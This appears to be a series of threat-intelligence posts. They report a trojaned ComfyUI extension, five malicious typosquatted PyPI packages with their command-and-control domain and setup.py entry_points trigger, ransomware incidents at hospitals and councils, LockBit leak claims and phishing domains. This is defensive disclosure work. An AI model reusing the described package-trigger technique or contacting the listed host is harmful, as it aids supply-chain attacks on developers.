PSA: If you use ComfyUI_LLMVISION in ComfyUI, it was hacked by "Nullbulge Group" and had malware injected. It had Async remote access trojan for Windows embedded in it.
"This repository provides integration of GPT-4 and Claude 3 models into ComfyUI, allowing for both image and text-based interactions within the ComfyUI workflow." #threatintel
You’re going to see some incredible media bias with the Synnovis ransomware incident as it impacts southern hospitals - whereas NHS Dumfries and Galloway are several months into their ongoing ransomware incident and barely any coverage. #threatintel
Reported 5 malicious #Python packages to #PyPI: numberpy, tqmmd, pandans, openpyexl, reqwestss all by the same user leemay1782.
All with the same "functionality", getting commands via a socket from dzgi0h7on1jhzdg0vknw9pp9309rxjl8.oastify[.]com and executing it.
I don't think I saw the setup.py entry_points being used as a trigger mechanism before?
Have a look, see what you think. How could I make it more useful to you?
It's generated using a custom-made graph-network abstraction layer I wrote in Python and then pulling some publicly available JSON-files for the Intrusion Sets and Techniques.
A couple of days ago, LockBit had published an entry on their leaksite titled "telekom.com". I asked the Telekom press corps and they denied any incident.
Yesterday, LB also published the data allegedy from Telekom. I had a look at the files. So far, it seems that nothing in the 1.2GByte directory on their file share has anything to do with Deutsche Telekom. It seems that in fact, they breached a client PC owned by a non-profit in Hamburg.
Seeing an actor register a bunch of domains through OwnRegistrar, protected by Cloudflare, that contain both "okta" and "segment" - several are already marked as active phishing sites.
On Thursday, my monitoring triggered for Leicester City Council’s network going offline again:
2024-06-07 21:03:32
They’ve not returned online since.
Their website now has a banner which says they are having “essential maintenance works”. The list of services is the same impacted by the ransomware incident.
Werewolves Group are a ransomware group who attack primarily Russian organisations, although orgs across Europe in total. They've been operating under the radar for a few months.
There are many ransomware operators who aren't in Russia and aren't being tracked properly, so I imagine the odds are the problem is going to keep spiralling into other regions. Shout out to Kazakhstan.
Russia is very very exposed in terms of cybersecurity and resiliency as attacking local orgs there will get the local feds to bash your door in.. so ransomware groups have left it untested. #threatintel